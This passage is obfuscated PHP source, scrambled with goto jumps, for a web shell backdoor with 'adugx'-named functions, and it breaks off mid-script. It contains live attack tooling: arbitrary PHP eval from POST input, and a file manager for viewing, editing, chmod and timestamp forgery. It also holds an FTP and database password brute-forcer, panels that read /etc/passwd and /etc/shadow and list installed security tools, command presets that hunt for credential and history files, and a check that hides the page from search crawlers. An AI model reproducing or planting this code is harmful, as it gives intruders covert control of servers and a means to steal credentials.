Bb7cf; Ee2a5: if (!($i >= 0)) { goto ad33e; } goto F483f; ac35e: goto c9132; goto B9162; bba3e: $tmp = ""; goto b840c; b840c: $i = strlen($line[0]) - 1; goto df80b; a956a: } goto Cf18e; C4cf7: $line = explode(":", $line); goto ad9d4; Be8f1: if (adugxBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } goto F5843; Afb32: } Cadda: } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { goto C44a6; C44a6: $line = trim($line); goto C253e; f72d4: if (adugxBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto Cae60; C253e: ++$attempts; goto f72d4; Cae60: D2161: goto cdbb5; cdbb5: } ea9c5: } } goto Bb016; af231: $success = 0; goto ae8cf; cefca: } goto Fc264; Fc264: echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; goto cf04d; cf04d: echo '</div><br>'; goto Fb73e; E2a48: adugxHeader(); goto defb5; Fb73e: adugxFooter(); goto F0d60; F0d60: } goto D0149; C0045: function actionFilesTools() { goto ed873; D153b: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { goto d6f9b; D2439: $fp = @fopen($_POST['p1'], "r"); goto ce6eb; F22ce: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto D2439; d6f9b: ob_start("ob_gzhandler", 4096); goto B4bea; ce6eb: if ($fp) { goto a3296; Ccc94: if (@feof($fp)) { goto Fa477; } goto bf194; bb989: fclose($fp); goto cad36; Bc9d9: goto Cccdc; goto e5742; bf194: echo @fread($fp, 1024); goto Bc9d9; a3296: Cccdc: goto Ccc94; e5742: Fa477: goto bb989; cad36: } goto a7a27; B4bea: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto F22ce; a7a27: } exit; } goto F7390; c418d: echo '<h1>File tools</h1><div class=content>'; goto C3858; B0f0a: echo '</div>'; goto F7327; b5fc6: foreach ($m as $v) { echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; cd0e9: } goto c1069; F7327: adugxFooter(); goto f2107; d39a5: cba39: goto C7ad6; C7ad6: A7a7a: goto B0f0a; D0126: adugxHeader(); goto c418d; e474d: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>'; goto bc614; Ae27e: echo '<br><br>'; goto df889; c1069: b146e: goto Ae27e; F7390: if (@$_POST['p2'] == 'mkfile') { if (!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } goto D0126; ece68: if (!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else { $gid = @posix_getgrgid(@filegroup($_POST['p1'])); } goto Ab5dd; C3858: if (!file_exists(@$_POST['p1'])) { goto fc6aa; ca44d: adugxFooter(); goto B3ed1; B3ed1: return; goto Ec2c3; fc6aa: echo 'File not exists'; goto ca44d; Ec2c3: } goto a10ca; df889: switch ($_POST['p2']) { case 'view': goto bf81e; b31c5: if ($fp) { goto ebb6f; C3f30: aa488: goto cf07e; ebb6f: A79ad: goto F116e; cf07e: @fclose($fp); goto b8ea5; d6fba: goto A79ad; goto C3f30; C46a3: echo htmlspecialchars(@fread($fp, 1024)); goto d6fba; F116e: if (@feof($fp)) { goto aa488; } goto C46a3; b8ea5: } goto A1988; D4f01: goto A7a7a; goto D5cc8; A1988: echo '</pre>'; goto D4f01; Be6c6: $fp = @fopen($_POST['p1'], 'r'); goto b31c5; bf81e: echo '<pre class=ml1>'; goto Be6c6; D5cc8: case 'highlight': if (@is_readable($_POST['p1'])) { goto b1d9c; b1d9c: echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; goto a0e17; a0e17: $code = @highlight_file($_POST['p1'], true); goto c7f1e; c7f1e: echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>'; goto c8132; c8132: } goto A7a7a; case 'chmod': goto B0b1e; Ae4b5: goto A7a7a; goto B1561; a23a2: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>'; goto Ae4b5; E3f69: clearstatcache(); goto a23a2; B0b1e: if (!empty($_POST['p3'])) { goto C9932; C9932: $perms = 0; goto C1695; cd4f3: D21c2: goto E1f35; faac6: $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto A2d2f; D4058: goto be484; goto cd4f3; E1f35: if (!@chmod($_POST['p1'], $perms)) { echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } goto Cbbaf; c6038: if (!($i >= 0)) { goto D21c2; } goto faac6; d59b0: --$i; goto D4058; C1695: $i = strlen($_POST['p3']) - 1; goto a98b6; a98b6: be484: goto c6038; A2d2f: Baf0e: goto d59b0; Cbbaf: } goto E3f69; B1561: case 'edit': goto F92ec; b7dd2: if (!empty($_POST['p3'])) { goto bb1f2; feac1: if ($fp) { goto D700c; D700c: @fwrite($fp, $_POST['p3']); goto c749a; c749a: @fclose($fp); goto df36b; df36b: echo 'Saved!<br><script>p3_="";</script>'; goto B6ba4; B6ba4: @touch($_POST['p1'], $time, $time); goto c34cd; c34cd: } goto E91d5; cc574: $_POST['p3'] = substr($_POST['p3'], 1); goto D989d; bb1f2: $time = @filemtime($_POST['p1']); goto cc574; D989d: $fp = @fopen($_POST['p1'], "w"); goto feac1; E91d5: } goto E23bd; c217b: goto A7a7a; goto b04ba; C8fe6: if ($fp) { goto d5280; Af5b1: @fclose($fp); goto d22bc; defa3: if (@feof($fp)) { goto A381c; } goto d8c74; d8c74: echo htmlspecialchars(@fread($fp, 1024)); goto ceed1; ceed1: goto Aaa32; goto b9a23; d5280: Aaa32: goto defa3; b9a23: A381c: goto Af5b1; d22bc: } goto d1e76; E23bd: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; goto e8f17; d1e76: echo '</textarea><input type=submit value=">>"></form>'; goto c217b; e8f17: $fp = @fopen($_POST['p1'], 'r'); goto C8fe6; F92ec: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto A7a7a; } goto b7dd2; b04ba: case 'hexdump': goto Daefa; d23ce: d135b: goto F0cf0; Ace22: $i = 0; goto cc138; Dc309: $h = array('00000000<br>', '', ''); goto ee9e5; ba865: e6f6a: goto Af013; bcbd6: ++$i; goto D5afc; cc138: a81a9: goto f0e92; F0cf0: e1f09: goto Dfd41; f01f8: ac7c1: goto bcbd6; ec76c: $n = 0; goto Dc309; F7904: goto A7a7a; goto Bfe4a; f0e92: if (!($i < $len)) { goto e6f6a; } goto E62c8; f0c77: switch (ord($c[$i])) { case 0: $h[2] .= ' '; goto e1f09; case 9: $h[2] .= ' '; goto e1f09; case 10: $h[2] .= ' '; goto e1f09; case 13: $h[2] .= ' '; goto e1f09; default: $h[2] .= $c[$i]; goto e1f09; } goto d23ce; Daefa: $c = @file_get_contents($_POST['p1']); goto ec76c; E62c8: $h[1] .= sprintf('%02X', ord($c[$i])) . ' '; goto f0c77; ee9e5: $len = strlen($c); goto Ace22; Af013: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>'; goto F7904; D5afc: goto a81a9; goto ba865; Dfd41: $n++; goto e39b1; e39b1: if ($n == 32) { goto b74d5; b292a: if ($i + 1 < $len) { $h[0] .= sprintf('%08X', $i + 1) . '<br>'; } goto A9cb4; b74d5: $n = 0; goto b292a; A9cb4: $h[1] .= '<br>'; goto F58e1; F58e1: $h[2] .= "\n"; goto a15a5; a15a5: } goto f01f8; Bfe4a: case 'rename': goto d40d3; d6842: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>'; goto c68ee; d40d3: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'], $_POST['p3'])) { echo 'Can\'t rename!<br>'; } else { die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>'); } } goto d6842; c68ee: goto A7a7a; goto F54ea; F54ea: case 'touch': goto D4e12; b2cd4: clearstatcache(); goto D4bdb; D4e12: if (!empty($_POST['p3'])) { $time = strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!'; } else { echo 'Touched!'; } } else { echo 'Bad time format!'; } } goto b2cd4; c10bc: goto A7a7a; goto Dc4b8; D4bdb: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>'; goto c10bc; Dc4b8: } goto d39a5; a10ca: $uid = @posix_getpwuid(@fileowner($_POST['p1'])); goto ece68; C962d: if (is_file($_POST['p1'])) { $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); } else { $m = array('Chmod', 'Rename', 'Touch'); } goto b5fc6; Ab5dd: echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? adugxViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . adugxPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>'; goto e474d; ed873: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto D153b; bc614: if (empty($_POST['p2'])) { $_POST['p2'] = 'view'; } goto C962d; f2107: } goto effb0; Cf1bb: $default_action = 'FilesMan'; goto de4e7; A9095: $safe_mode = @ini_get('safe_mode'); goto ca9db; Abd9c: if (!empty($auth_pass)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { adugxsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) { adugxLogin(); } } goto d6fdb; a7fa4: $disable_functions = @ini_get('disable_functions'); goto D9101; Bf534: if (get_magic_quotes_gpc()) { goto Fcd56; bd439: $_POST = adugxstripslashes($_POST); goto b37ea; Fcd56: function adugxstripslashes($array) { return is_array($array) ? array_map('adugxstripslashes', $array) : stripslashes($array); } goto bd439; b37ea: $_COOKIE = adugxstripslashes($_COOKIE); goto Bc6e1; Bc6e1: } goto Ee2ae; Bbf18: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto dc9a6; ebd9f: function actionSecInfo() { goto ea1fb; b8d51: adugxSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto ead0a; ac402: echo '</div>'; goto D8e5f; F9970: echo '<br>'; goto A7864; Ea04e: adugxSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto b8d51; A7864: if ($GLOBALS['os'] == 'nix') { goto Ec89b; c240e: adugxSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto effff; Ec89b: adugxSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto fc97c; effff: if (!$GLOBALS['safe_mode']) { goto F931f; Af984: adugxSecParam('HDD space', adugxEx('df -h')); goto c0232; D0a01: foreach ($downloaders as $item) { if (adugxWhich($item)) { $temp[] = $item; } C15db: } goto Fe1b4; A3c77: ebebb: goto ce9ba; dd806: echo '<br/>'; goto Af984; ce9ba: adugxSecParam('Danger', implode(', ', $temp)); goto f12de; E304f: echo '<br>'; goto c3ce3; bfdc3: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { goto a2844; d15b4: if (!($_POST['p2'] <= $_POST['p3'])) { goto Bede7; } goto D011c; Dc5a0: if ($uid) { $temp .= join(':', $uid) . "\n"; } goto Bf36a; cc293: goto E1bb1; goto Dd019; F6b5c: $_POST['p2']++; goto cc293; d665f: E1bb1: goto d15b4; D011c: $uid = @posix_getpwuid($_POST['p2']); goto Dc5a0; c311f: adugxSecParam('Users', $temp); goto De131; Dd019: Bede7: goto cad9b; a2844: $temp = ""; goto d665f; Bf36a: Ed417: goto F6b5c; cad9b: echo '<br/>'; goto c311f; De131: } goto e2b14; Ba707: adugxSecParam('Downloaders', implode(', ', $temp)); goto dd806; F7a6d: foreach ($userful as $item) { if (adugxWhich($item)) { $temp[] = $item; } Cc101: } goto Df5cf; f12de: $temp = array(); goto D0a01; E887a: $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); goto E304f; c0232: adugxSecParam('Hosts', @file_get_contents('/etc/hosts')); goto Da3e7; Da3e7: echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; goto bfdc3; Db54d: adugxSecParam('Userful', implode(', ', $temp)); goto dcc71; F931f: $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); goto e4812; Df5cf: D5aeb: goto Db54d; c3ce3: $temp = array(); goto F7a6d; E71a3: foreach ($danger as $item) { if (adugxWhich($item)) { $temp[] = $item; } A799b: } goto A3c77; e4812: $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto E887a; dcc71: $temp = array(); goto E71a3; Fe1b4: Ba240: goto Ba707; e2b14: } goto b4ff5; fc97c: adugxSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto ae908; ae908: adugxSecParam('OS version', @file_get_contents('/proc/version')); goto c240e; b4ff5: } else { goto D2b4d; E39f0: adugxSecParam('Account Settings', adugxEx('net accounts')); goto b8fb5; D2b4d: adugxSecParam('OS Version', adugxEx('ver')); goto E39f0; b8fb5: adugxSecParam('User Accounts', adugxEx('net user')); goto de8bf; de8bf: } goto ac402; cba02: if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto b380c; baf11: function adugxSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "\n") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } goto bec9d; a9f49: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto Eccaf; ead0a: adugxSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto Af503; Eccaf: adugxSecParam('Supported databases', implode(', ', $temp)); goto F9970; D8e5f: adugxFooter(); goto B654d; a0e3c: adugxSecParam('Open base dir', @ini_get('open_basedir')); goto Ea04e; ea1fb: adugxHeader(); goto B5f8c; bec9d: adugxSecParam('Server software', @getenv('SERVER_SOFTWARE')); goto C52d2; Af503: $temp = array(); goto cba02; C52d2: if (function_exists('apache_get_modules')) { adugxSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } goto Ac373; Ac373: adugxSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); goto a0e3c; Fab3c: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } goto a9f49; B5f8c: echo '<h1>Server security information</h1><div class=content>'; goto baf11; b380c: if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } goto Fab3c; B654d: } goto ffd4b; b0b4b: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "adugx_version" => adugx_VERSION, "safemode" => @ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto Ba635; E92e7: if ($os == 'win') { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto f5f8c; f5f8c: function adugxHeader() { goto eebb4; Ca843: $j++; goto B54f6; e8fd9: $i = 0; goto Bc24d; d6ffc: $opt_charsets = ''; goto E1a36; b053f: if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } a0766: } caa49: } goto De69c; Df8b6: goto F5557; goto B9476; Acc14: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto F256c; B9476: E536e: goto c4a74; ef36f: $totalSpace = @disk_total_space($GLOBALS['cwd']); goto d5f7a; d5e08: Bd886: goto Ca843; Bc24d: F5557: goto Ff5e0; E1a36: foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; f464f: } goto F8ca3; cb53e: global $color; goto fe3c6; Aeba1: C3908: goto dad24; D2ef9: $cwd_links .= $path[$j] . '/'; goto d5e08; ec6c8: $kernel = @php_uname('s'); goto d65a7; e6f49: $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; goto bfbb4; Ff5e0: if (!($i < $n - 1)) { goto E536e; } goto e6f49; ea093: $cwd_links .= "\")'>" . $path[$i] . "/</a>"; goto db581; F7925: $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto Acc14; dad24: if (!($j <= $i)) { goto ba8af; } goto D2ef9; F256c: $m['Self remove'] = 'SelfRemove'; goto dfe51; c1cc7: $i++; goto Df8b6; Fa7b8: $cwd_links = ''; goto D0d6f; A4e1b: $release = @php_uname('r'); goto ec6c8; B51cd: $freeSpace = @diskfreespace($GLOBALS['cwd']); goto ef36f; De69c: echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . adugxViewSize($totalSpace) . ' <span>Free:</span> ' . adugxViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . adugxPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; goto Dc2c0; cf9fe: Ae09c: goto E34f4; B54f6: goto C3908; goto F4bb8; d5f7a: $totalSpace = $totalSpace ? $totalSpace : 1; goto A4e1b; E34f4: $drives = ""; goto b053f; d65a7: $explink = ''; goto b2423; c4a74: $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); goto d6ffc; D0d6f: $path = explode("/", $GLOBALS['cwd']); goto Eb92a; dfe51: $menu = ''; goto c2a99; bfbb4: $j = 0; goto Aeba1; Eb92a: $n = count($path); goto e8fd9; db581: a9bf9: goto c1cc7; E5b43: if (!function_exists('posix_getegid')) { goto da3b0; da3b0: $user = @get_current_user(); goto D386e; D386e: $uid = @getmyuid(); goto ea63e; f0c1d: $group = "?"; goto Eecfe; ea63e: $gid = @getmygid(); goto f0c1d; Eecfe: } else { goto d0e10; c0dea: $gid = $gid['gid']; goto Beffa; D9e60: $user = $uid['name']; goto f62ed; d0e10: $uid = @posix_getpwuid(posix_geteuid()); goto a7757; f62ed: $uid = $uid['uid']; goto Bdef1; a7757: $gid = @posix_getgrgid(posix_getegid()); goto D9e60; Bdef1: $group = $gid['name']; goto c0dea; Beffa: } goto Fa7b8; F4bb8: ba8af: goto ea093; b2423: if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto E5b43; F8ca3: C7ad1: goto F7925; eebb4: if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } goto cb53e; fe3c6: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( 